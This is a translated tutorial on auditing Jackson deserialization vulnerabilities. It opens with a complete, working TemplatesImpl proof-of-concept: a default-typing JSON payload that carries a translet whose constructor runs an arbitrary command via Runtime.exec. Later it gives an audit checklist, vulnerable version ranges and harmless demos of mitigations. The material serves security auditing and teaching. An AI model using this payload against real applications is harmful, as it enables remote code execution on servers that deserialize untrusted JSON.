A Beginner's Guide to Auditing Jackson Deserialization Vulnerabilities


1. Jackson vulnerability analysis

PoC code: main.java

import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;

/**
 * Created by Administrator on 2017/6/12.
 */
public class main {

    public static void main(String[] args) {
        String MASIT_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
        // Change this to the absolute path of the compiled exp.class
        String exp = readClassStr("D:\\workspace\\123\\target\\classes\\exp.class");
        // Default typing encodes a polymorphic value as ["class name", {properties}]:
        // the bytecode array, a translet name (any non-null value) and outputProperties,
        // whose getter is what triggers the translet instantiation
        String jsonInput = aposToQuotes("{\"object\":['" + MASIT_CLASS + "',\n" +
                "{\n" +
                "'transletBytecodes':['" + exp + "'],\n" +
                "'transletName':'p',\n" +
                "'outputProperties':{}\n" +
                "}\n" +
                "]\n" +
                "}");
        System.out.println(jsonInput);
        ObjectMapper mapper = new ObjectMapper();
        // Global default typing: the JSON, not the bean, decides which class is instantiated
        mapper.enableDefaultTyping();
        User user;
        try {
            user = mapper.readValue(jsonInput, User.class);
            System.out.println(user.getObject());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static String aposToQuotes(String json) {
        return json.replace("'", "\"");
    }

    // Reads the class file and Base64-encodes it for the transletBytecodes array
    public static String readClassStr(String cls) {
        try {
            return Base64.getEncoder().encodeToString(Files.readAllBytes(Paths.get(cls)));
        } catch (IOException e) {
            e.printStackTrace();
            return "";
        }
    }
}

exp.java

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.*;

/**
 * Created by Administrator on 2017/6/12.
 */
public class exp extends AbstractTranslet {
    // Everything happens in the constructor: it runs as soon as TemplatesImpl
    // instantiates the translet class loaded from transletBytecodes
    public exp() throws Exception {
        try {
            // Change this to the command you want to run
            Process p = Runtime.getRuntime().exec("ipconfig");
            BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));

            String line;
            StringBuilder sb = new StringBuilder();
            while ((line = br.readLine()) != null) {
                sb.append(line).append("\n");
            }

            // Append the command output to result.txt in the working directory
            File file = new File("result.txt");
            if (!file.exists()) {
                file.createNewFile();
            }

            // true = append to the file
            FileWriter fileWriter = new FileWriter(file.getName(), true);
            BufferedWriter bufferWriter = new BufferedWriter(fileWriter);
            bufferWriter.write(sb.toString());
            bufferWriter.close();
            System.out.println(sb);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
}

User.java

/**
 * Created by Administrator on 2017/6/12.
 */
public class User {
    // A property declared as Object: with default typing enabled, the JSON
    // supplies the concrete class that gets instantiated here
    private Object object;
    public Object getObject() {
        return object;
    }
    public void setObject(Object object) {
        this.object = object;
    }
}

Try running it:
result.txt now contains the output of ipconfig (the Chinese ipconfig labels were mis-encoded in the original and are given here in English):

Windows IP Configuration


Ethernet adapter Ethernet 2:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Ethernet adapter Npcap Loopback Adapter:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::b047:25da:330b:45d4%18
   Autoconfiguration IPv4 Address. . : 169.254.69.212
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 

Ethernet adapter (name garbled in the original):

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::fd81:27ba:8b8b:4a72%12
   IPv4 Address. . . . . . . . . . . : 10.0.83.198
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.83.1

Debugging the code locally:
Since in Jackson the command ends up being executed from readValue, press F7 to step into that function.

After stepping past a few assignments you reach the function below, in which the deserialized value is assigned; press F7 to step in.

After a number of steps, the command turns out to execute at the highlighted line, after which an exception is thrown.

Stepping further with F7 lands in SetterlessProperty.java:

Code execution:

This is the actual trigger. TemplatesImpl exposes outputProperties through getOutputProperties() with no matching setter. Jackson's MapperFeature.USE_GETTERS_AS_SETTERS is on by default, so a Map-typed property that has only a getter is bound as a SetterlessProperty: during readValue Jackson calls the getter to obtain the existing map and then fills it from the JSON. TemplatesImpl.getOutputProperties() builds a Transformer from the supplied transletBytecodes, which defines and instantiates the translet class, so the constructor of exp, and the command inside it, runs before readValue returns.
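To see the SetterlessProperty path on its own, without the TemplatesImpl gadget, here is an added example that is not part of the original post. It uses a harmless bean constructed for the demonstration: Config exposes a Map through getProps() with no setter and no same-named field, so Jackson's default USE_GETTERS_AS_SETTERS behaviour has to call the getter during readValue to obtain the map it fills. The counter in Config stands in for the side effects of TemplatesImpl.getOutputProperties().

```java
import com.fasterxml.jackson.databind.MapperFeature;
import com.fasterxml.jackson.databind.ObjectMapper;

import java.util.HashMap;
import java.util.Map;

public class SetterlessDemo {

    // Constructed for this example: a Map-typed property with a getter but no setter.
    // The backing field is deliberately named _props so Jackson cannot fall back to
    // writing a field called "props" directly; it would prefer that over the getter.
    public static class Config {
        private final Map<String, String> _props = new HashMap<>();
        private int getterCalls = 0;

        public Map<String, String> getProps() {
            getterCalls++;   // observable side effect, like TemplatesImpl building a Transformer
            return _props;
        }

        // Not a get-prefixed name, so Jackson does not treat it as a property
        public int timesGetterCalled() {
            return getterCalls;
        }
    }

    // Constructed input: only the getter-only property is present
    static final String INPUT = "{\"props\":{\"a\":\"1\"}}";

    static void run(String label, ObjectMapper mapper) {
        try {
            Config c = mapper.readValue(INPUT, Config.class);
            int calls = c.timesGetterCalled();
            System.out.println(label + ": getter called " + calls
                    + " time(s) during readValue, props=" + c._props);
        } catch (Exception e) {
            System.out.println(label + ": rejected: " + e.getMessage());
        }
    }

    public static void main(String[] args) {
        // Default configuration: USE_GETTERS_AS_SETTERS is on, so Jackson binds "props"
        // as a SetterlessProperty and invokes getProps() to get the map to fill
        run("default", new ObjectMapper());

        // With the feature off there is no mutator for "props": the input is either
        // rejected as an unknown property or ignored, and the getter is never invoked
        ObjectMapper noGetterMutators = new ObjectMapper()
                .configure(MapperFeature.USE_GETTERS_AS_SETTERS, false);
        run("USE_GETTERS_AS_SETTERS=false", noGetterMutators);
    }
}
```

Disabling USE_GETTERS_AS_SETTERS closes this particular path, but it is not the fix for the page's vulnerability: the root cause is that the attacker chooses the class at all, which is what default typing allows.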

 

 

2. How to audit for Jackson deserialization vulnerabilities

That covers, briefly, how Jackson's deserialization ends up running code. So in a code audit, how do you tell whether a project is exposed to Jackson deserialization?

Step 1: check the version. If the Jackson version is not in the list of vulnerable versions, this particular vulnerability is not present. Treat the list as a first filter for the TemplatesImpl gadget shown above rather than a clean bill of health: later jackson-databind releases blocked further gadget classes one at a time, so a newer version that still satisfies steps 2 and 3 deserves the same scrutiny.

Vulnerable versions:

Jackson 2.7 (< 2.7.10)

Jackson 2.8 (< 2.8.9)

Step 2: check whether a bean class contains a field of type Object. For example, the User class here declares it as private Object object. Any other non-concrete declared type (an interface or abstract class) counts as well, because default typing in its default mode covers those too.

Step 3: the ObjectMapper must call enableDefaultTyping:

ObjectMapper mapper = new ObjectMapper();

mapper.enableDefaultTyping();

A property annotated with @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS) has the same effect for that one property without the global call, so search for both.

Only when all three conditions hold is it worth constructing a PoC to confirm.
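Putting steps 2 and 3 together, here is an added example that is not part of the original post. It reproduces the audit conditions with a harmless class in place of TemplatesImpl: the same User bean with an Object-typed field is parsed once with enableDefaultTyping(), once with no default typing, and once with the allow-list validator that Jackson 2.10 and later provide as the replacement. The package prefix com.example.model. in the allow-list is an assumed application package, not anything from the page.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class DefaultTypingAudit {

    // Same shape as the page's User bean: audit step 2, a property declared as Object
    public static class User {
        private Object object;
        public Object getObject() { return object; }
        public void setObject(Object object) { this.object = object; }
    }

    // Constructed input in the ["class name", {...}] form that default typing expects.
    // java.util.HashMap stands in for the attacker-chosen class; the bean never names it.
    static final String INPUT = "{\"object\":[\"java.util.HashMap\",{\"k\":\"v\"}]}";

    static void tryParse(String label, ObjectMapper mapper) {
        try {
            User u = mapper.readValue(INPUT, User.class);
            System.out.println(label + ": object is a " + u.getObject().getClass().getName());
        } catch (Exception e) {
            System.out.println(label + ": rejected: " + e.getMessage());
        }
    }

    public static void main(String[] args) {
        // Audit step 3: global default typing with no validator. The JSON picks the
        // class: here a HashMap, in the PoC TemplatesImpl.
        ObjectMapper vulnerable = new ObjectMapper();
        vulnerable.enableDefaultTyping();
        tryParse("enableDefaultTyping()", vulnerable);

        // Step 3 not met: without default typing the array is bound as an ArrayList
        // holding a String and a LinkedHashMap; no class name is ever resolved
        tryParse("no default typing", new ObjectMapper());

        // Jackson 2.10+ replacement: default typing limited to an explicit allow-list.
        // "com.example.model." is an assumed application package for this example;
        // java.util.HashMap is outside it, so resolution is denied with an exception.
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.")
                .build();
        ObjectMapper restricted = new ObjectMapper();
        restricted.activateDefaultTyping(ptv);
        tryParse("activateDefaultTyping(allow-list)", restricted);
    }
}
```

During an audit, the first run is the condition you are looking for: a class name from the input becomes an instantiated object, with the bean's declared type imposing no restriction. The second and third runs are the two acceptable states to find instead.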

 

